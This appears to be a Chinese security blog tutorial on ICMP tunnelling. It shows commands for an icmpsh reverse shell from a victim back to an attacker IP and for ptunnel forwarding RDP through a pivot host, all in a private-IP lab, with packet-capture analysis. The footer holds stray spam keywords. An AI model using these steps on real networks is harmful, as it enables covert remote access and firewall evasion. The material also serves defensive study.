<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ICMP隧道攻擊

    VSole2022-04-27 21:50:29

    ICMP隧道攻擊

    ICMP隧道模式簡介

    ICMP一般用于檢測網絡的可通性,

    所以一般在防火墻設備上都不會用策略去禁止它(ping),這也就使得了有很大的可能性去使用ICMP隧道進行相應的攻擊,達到一種偽裝.

    而能達到這種攻擊的原因是在CMP報文結構中,有數據部分是可控的,所以可以利用可控數據部分去構造相應的攻擊語句.

    1.icmpsh使用

    下載地址:GitHub - k1132/icmpsh: Simple reverse ICMP shell[1]

    py使用前需安裝Impacket依賴庫


    git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketsudo python setup.py  instal
    

    開啟前需要先關閉攻擊機的icmp應答,防止內核對自己的ping包響應


    sysctl -w net.ipv4.icmp_echo_ignore_all
    

    不關閉就會導致不穩定

    ①將exe執行文件上傳到受害機 ,并執行

    執行代碼如下:


    icmpsh.exe -t 攻擊機IP地址
    

    ②攻擊機進行監聽

    python2 icmpsh_m.py 攻擊者IP 受害者IP
    

    ③抓包分析

     通過抓取該網卡可以觀察到都是ICMP報文的數據包

    在反彈的shell執行whoami并在數據包中查看數據信息

    最后, 通過報文分析可以知道ICMP隧道是將執行的代碼封裝在了ICMP報文中的數據中

    2.ptunnel 使用

    下載地址:https://github.com/f1vefour/ptunnel 需自行編譯


    ptunnel參數含義:-p ##表示連接 icmp 隧道另一端的機器 IP(即目標服務器) -lp ##表示需要監聽的本地 tcp 端口 -da ##指定需要轉發的機器的 IP(即目標內網某一機器的內網 IP) -dp ##指定需要轉發的機器的端口(即目標內網某一機器的內網端口) -x ##設置連接的密碼
    

    進入解壓后文件輸入如下即可:


    make install
    

    開啟前需要先關閉攻擊機的icmp應答,防止內核對自己的ping包響應


    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    

    環境模擬:

    ①將編譯好的ptunnel上傳到跳板機

    并賦予可執行權限

    ②設置連接密碼

    ./ptunnel -x mrfan
    

    ③攻擊機將轉發的 3389請求數據給本地 6666

    ./ptunnel -p 192.168.1.14 -lp 6666 -da 192.168.22.14 -dp 3389 -x mrfan
    -p ##表示連接 icmp 隧道另一端的機器 IP(即目標服務器) -lp ##表示需要監聽的本地 tcp 端口 -da ##指定需要轉發的機器的 IP(即目標內網某一機器的內網 IP) -dp ##指定需要轉發的機器的端口(即目標內網某一機器的內網端口) -x ##連接的密碼
    

    ③利用連接好的跳板機去連接受害機

    rdesktop 127.0.0.1:6666
    

    ④抓包分析

    通過在192.168.1.0/24網卡上進行抓包

    可以抓到許多ICMP的數據包, 并是由192.168.1.11(攻擊機)與192.168.1.14(跳板機)的請求應答包, 所以這也是通過ICMP的數據部分進行了相應的偽裝所造成的攻擊

    References

    [1] GitHub - k1132/icmpsh: Simple reverse ICMP shell: https://github.com/k1132/icmpsh

    icmp
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    ICMPWatch是一款功能強大的ICMP數據包嗅探工具,該工具基于Python 3開發,可以幫助廣大研究人員捕捉和分析ICMP(Internet控制報文協議)數據包。該工具能提供有關捕捉數據包的詳細信息,包括數據包源IP地址、目標IP地址、MAC地址、ICMP類型以及Payload數據等。除此之外,該工具還支持將捕捉到的數據包存儲到SQLite數據庫中,并以pcap格式保存。
    icmp 隧道代理搭建
    2022-08-07 20:17:09
    簡介 在內網滲透中,內網隧道的搭建是必不可少的。有條件的情況下,優先使用tcp隧道,比較穩定可靠。但是遇到只有icmp協議出網的時候,就需要利用別的思路了。ICMP代理 兩臺機器之間,只允許icmp 協議通訊,其他的協議tcp/udp 不允許,那么可以考慮利用icmp 隧道進行穿透。
    ICMP隧道攻擊
    2022-04-27 21:50:29
    ICMP一般用于檢測網絡的可通性
    ICMP協議通常用來測試網絡通不通、主機可不可達、路由可不可用。宅男們打游戲時也常用來ping一下,看看延遲高不高,太高迅雷就得關一關了。 而網絡攻擊者通過ICMP協議,可以進行隧道傳輸,實現數據竊取,規避掉一些防火墻規則。 如何檢測這種隧道?用傳統的簽名無法對抗負載加密,復雜的統計比對讓檢測引擎不堪重負,準確率也不高。 而基于ICMP常規的通訊數據和攻擊時產生的畸形數據,利用信息熵來分析,
    它是TCP/IP協議簇的一個子協議,用于在IP主機、路由器之間傳遞控制消息。這些控制消息雖然并不傳輸用戶數據,但是對于用戶數據的傳遞起著重要的作用ICMP協議主要提供兩種功能,一種是差錯報文,一種是信息類報文。標識符和序號字段分別是16 位的字段。對于標識符,應用程序執行期間送出的所有報文里填入相同的值。例如,icmptunnel會在所有的ICMP payload前添加”TUNL”標記來識別隧道。
    使用 ICMP 傳遞 shellcode
    2021-02-17 21:59:14
    在研究不同的滲透方法時,我遇到了一種利用DNS的技術。在編寫概念證明代碼時,我注意到實現的ping函數很有趣。我們可以提供一個可容納65,500字節的緩沖區。由于大小限制很大,我們可以將shellcode加載到我們的ICMP請求中,然后將其注入到目標的進程中。
    近期,觀成科技安全研究團隊在現網中檢測到了利用Gost工具實現加密隧道的攻擊行為。
    一個ICMP報文包括IP報頭、ICMP報頭和ICMP報文。當IP報頭中的協議字段值為1時,就說明這是一個ICMP報文。
    關于QueenSonoQueenSono是一款針對ICMP協議的數據提取工具,該工具基于Golang開發,并且只依賴于ICMP協議不受監控這一事實實現其功能。除此之外,該工具也可以用于基本的ICMP檢查,或繞過某些身份驗證機制,比如說許多公共Wi-Fi在連接到Wi-Fi后用于對用戶進行身份驗證。工具安裝從源碼安裝廣大研究人員可以直接使用下列命令將該項目源碼克隆至本地
    ping 使用 ICMP 協議, ICMP 工作在 IP層所以無端口號, 當多個進程使用ICMP 的時候,
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类